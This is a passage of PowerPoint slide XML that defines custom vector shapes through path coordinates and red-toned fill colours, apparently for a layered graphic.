                  <a:lnTo>
                    <a:pt x="1015174" y="118071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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71413131-26E4-E8B9-FD6F-861AD611B212}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6951977" y="3639236"/>
              <a:ext cx="325755" cy="182245"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="325754" h="182245">
                  <a:moveTo>
                    <a:pt x="325534" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="62967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="182154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325534" y="127058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325534" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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564AAA89-FC65-4EF8-5481-AB4EB3FEC1B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6437008" y="3703332"/>
              <a:ext cx="1015365" cy="739140"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1015365" h="739139">
                  <a:moveTo>
                    <a:pt x="158800" y="588073"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="611682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="738746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="706132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158800" y="588073"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="739139">
                  <a:moveTo>
                    <a:pt x="499084" y="523976"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="174688" y="586943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174688" y="706132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="651040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="523976"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="739139">
                  <a:moveTo>
                    <a:pt x="499084" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="174688" y="55092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174688" y="182156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="118059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="499084" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1015365" h="739139">
                  <a:moveTo>
                    <a:pt x="1015174" y="437400"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="856373" y="461010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="856373" y="588073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="555459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1015174" y="437400"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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4DD0FE4C-AF07-F34D-8386-ADD1670749AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6951977" y="4172208"/>
              <a:ext cx="325755" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="325754" h="174625">
                  <a:moveTo>
                    <a:pt x="325534" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="174283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325534" y="119187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325534" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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4F490AB5-CE82-16E0-B9E0-4F8BA80563F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279350" y="3328898"/>
              <a:ext cx="158115" cy="1120140"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="978242"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="923150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="929894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="984986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="978242"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="851192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="787095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="802843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="859053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="851192"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="716254"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="660031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="666788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="722998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="716254"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="580199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="525106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="532980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="597065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="580199"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="454266"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="398043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="404799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="461010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="454266"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="317093"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="263118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="270992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="333959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="317093"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="190030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="142811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="199021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="190030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157657" y="55105"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="64096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="55105"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="1120139">
                  <a:moveTo>
                    <a:pt x="157670" y="1113180"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1058075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1064818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157670" y="1119924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157670" y="111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0F5230C4-C4E4-AA7B-70EF-C8BB4CD6DBF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279350" y="3209721"/>
              <a:ext cx="158115" cy="572770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="158114" h="572770">
                  <a:moveTo>
                    <a:pt x="157657" y="453136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="390169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="517220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="572325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="453136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="572770">
                  <a:moveTo>
                    <a:pt x="157657" y="183273"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="128181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="254114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="310337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="183273"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="572770">
                  <a:moveTo>
                    <a:pt x="157657" y="55092"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="175399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="55092"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C5110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1B3921EC-A62A-61AA-E572-42D88835CE62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279350" y="3472827"/>
              <a:ext cx="158115" cy="571500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="158114" h="571500">
                  <a:moveTo>
                    <a:pt x="157657" y="452018"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="389051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="516102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="571207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="452018"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="571500">
                  <a:moveTo>
                    <a:pt x="157657" y="55092"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="174282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="55092"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E3392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52E6A788-AA10-7CB9-165F-C204C9BAD53B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279350" y="3996804"/>
              <a:ext cx="158115" cy="572770"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="158114" h="572770">
                  <a:moveTo>
                    <a:pt x="157657" y="190030"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="134937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="254114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="309219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="190030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="572770">
                  <a:moveTo>
                    <a:pt x="157657" y="55092"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="119189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="182156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="55092"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="572770">
                  <a:moveTo>
                    <a:pt x="157670" y="453136"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="398043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="517232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157670" y="572325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157670" y="453136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C5110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D85B013C-A4F6-F862-2025-72BAE60FC479}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279350" y="3734815"/>
              <a:ext cx="158115" cy="707390"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="158114" h="707389">
                  <a:moveTo>
                    <a:pt x="157657" y="55092"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="174282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157657" y="55092"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="158114" h="707389">
                  <a:moveTo>
                    <a:pt x="157670" y="707263"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="157657" y="580199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="525106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="651040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157670" y="707263"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E3392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71C0A1A0-E738-FA6F-1930-6A24173625E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279356" y="2900497"/>
              <a:ext cx="1172845" cy="230504"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1172845" h="230505">
                  <a:moveTo>
                    <a:pt x="1014035" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="174283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157663" y="230504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172832" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014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61F1802F-1EE1-EF57-97B2-B6B4CD0FD9DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279356" y="3019685"/>
              <a:ext cx="491490" cy="110489"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="491490" h="110489">
                  <a:moveTo>
                    <a:pt x="332340" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157663" y="110192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491137" y="62967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332340" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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30407854-E048-6585-BD92-898BEDDBF01A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579937" y="2955593"/>
              <a:ext cx="539115" cy="135255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="539115" h="135255">
                  <a:moveTo>
                    <a:pt x="372039" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="62967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197362" y="134929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538777" y="70837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372039" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="DD150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FF65504-0A54-9AA5-C02E-C17765B1AC8C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6959917" y="2900497"/>
              <a:ext cx="492759" cy="135255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="492759" h="135255">
                  <a:moveTo>
                    <a:pt x="333474" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158797" y="134929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="492272" y="55096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333474" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FB412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60E34134-DFBF-728F-CAD0-443C7D611C63}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6279350" y="3082658"/>
              <a:ext cx="1161415" cy="1423670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1161415" h="1423670">
                  <a:moveTo>
                    <a:pt x="1160868" y="141465"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="127063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1073302" y="127063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="133794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1035011" y="35610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1160767" y="14389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158138" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1070165" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="11099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="40779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="139166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="169621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="199364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="303123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="355193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520052" y="255244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512318" y="255244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="199364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="830846" y="169621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="695782" y="193306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694728" y="95415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679450" y="95580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="40779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1004392" y="11099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158102" y="153847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5156" y="101015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="114769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130581" y="175412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206209" y="175412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326275" y="155155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="664146" y="98171"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665213" y="198666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="253377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="353314" y="159664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="159664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="258749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158343" y="287578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5689" y="228434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="242011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="257797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135597" y="310337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198297" y="310337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318973" y="289166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="259270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="360324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158102" y="415836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5156" y="363029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="376770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="392303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130581" y="437400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206514" y="437400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="417931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="521830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158394" y="550646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5778" y="490474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="504012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="519836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133121" y="572325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204482" y="572325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318782" y="552272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="522351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="622350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158051" y="677875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5067" y="626084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="639876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="655370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="700506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200050" y="700506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="679958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="783856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158000" y="812749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5067" y="760895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="835444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198297" y="835444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320281" y="814031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="784364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="884339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158064" y="939863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5067" y="888072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="901865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="917359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133350" y="962494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200050" y="962494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="941946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322694" y="1048296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158102" y="1075867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5156" y="1023048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1036802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1052334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130581" y="1097432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206514" y="1097432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327355" y="1077175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="1050023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489432" y="1151521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158343" y="1209598"/>
                  </a:lnTo>
                  <a:lnTo>
